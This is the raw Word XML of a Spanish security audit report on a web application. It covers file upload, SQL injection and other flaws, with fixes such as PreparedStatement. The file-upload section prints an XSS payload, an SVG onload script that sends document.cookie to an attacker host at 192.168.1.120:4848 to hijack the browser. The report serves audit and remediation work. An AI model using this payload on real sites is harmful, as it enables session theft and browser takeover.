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xsv1vgio89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de vulnerabilidades (Inicial) -&gt;</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63sxu3z9sr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Solución File upload -&gt;</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74nwnmdai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SQL INJECTION -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">7</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yvb46iyege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Spring Boot Actuator v2 -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">16</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vd7rtbpwj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XSS -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">19</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veqmqq5nv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Validación de los campos:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">38</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01nng3qu52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Contraseña enviada por Http-&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">45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6qr6p8odl5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Versión desactualizada Bootstrap-&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">46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1vnkjfrm0n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Versión desactualizada JQUERY -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">48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7hx3z1ozd2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Stack Trace Disclosure (Java) -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">49</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grg771l5o1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File Intrusion</w:t>
              <w:tab/>
              <w:t xml:space="preserve">51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xulb879lyq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 of Hard-coded Credentials</w:t>
              <w:tab/>
              <w:t xml:space="preserve">53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0rspwt9x14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Security Misconfiguration</w:t>
              <w:tab/>
              <w:t xml:space="preserve">54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fsdd7p4j6x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Insuficiencia de validación en el servidor</w:t>
              <w:tab/>
              <w:t xml:space="preserve">56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s5fg2zibce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Brute Force</w:t>
              <w:tab/>
              <w:t xml:space="preserve">59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0m760ycer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Observable Discrepancy</w:t>
              <w:tab/>
              <w:t xml:space="preserve">60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c04644sww3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Conexión no encriptada -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">61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1b4p2kplof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Las credenciales de usuario se mandan en texto plano -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">62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n9s99uvjk9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Cookies con propiedades faltantes, inconsistentes o contradictorias -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">63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3blfuwf3sv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Stack Trace Disclosure (Java) -&gt;</w:t>
              <w:tab/>
              <w:t xml:space="preserve">67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eko2kfd24x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Git -&gt;</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3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g8d1i0s2ggzh" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9xsv1vgio89x" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de vulnerabilidades (Inicial) -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">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719705"/>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400040" cy="271970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719705"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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400040" cy="271970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719705"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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400040" cy="271970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719705"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>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400040" cy="271970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F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h63sxu3z9srt" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Solución File upload -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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902585"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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400040"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Explotación:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Para explotar esta vulnerabilidad voy a subir un archivo html, en el campo de la imagen del usuario, este archivo será así:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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&lt;svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//192.168.1.120:4848?".concat(document.cookie)},1010)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">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3E">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Este código creará una Shell reversa, en donde tomaré el control del navegador, para esto usaré un programa llamado “JSSshell”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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1">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5727700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35"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Ahora subiré  el archivo </w:t>
        <w:tab/>
        <w:t xml:space="preserve">HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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Ahora copiando la ruta de la imagen, y escribiéndola en el navegador:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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7">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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997200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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9">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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C">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Consigo la Shell, tomando el control del navegador:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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09900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30"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0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_574nwnmdaifp" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL INJECTION -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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4247"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4247"/>
            <w:gridCol w:w="4247"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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CWE-89</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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55">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vector de acceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Complejidad de acceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Autentificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ninguna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidencialidad </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Parcial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Impacto en la integridad </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Parcial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Vector de ataque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Red</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Complejidad el ataque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Baja</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilegios Requeridos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ninguno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Confidencialidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Puntuación Base </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Un atacante puede utilizar la inyección SQL para eludir los mecanismos de autenticación y autorización de una aplicación web y recuperar el contenido completo de una base de datos, también se puede usar para eliminar, añadir y modificar los registros de una base de datos, modificando su integridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Solución:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Para solucionar esta vulnerabilidad, lo que tenemos que hacer es que todas las consultas se realizan mediante PreparedStatement, con esto conseguiremos que no se puedan inyectar caracteres maliciosos en los parámetros de la consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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Modificaré uno a uno todas las consultas que no funcionen mediante un PreparedStatement:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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AbstractRepository:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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902585"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="56" name="image51.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Texto&#10;&#10;Descripción generada automáticamente" id="0" name="image51.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040"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CommentRepository:</w:t>
      </w:r>
    </w:p>
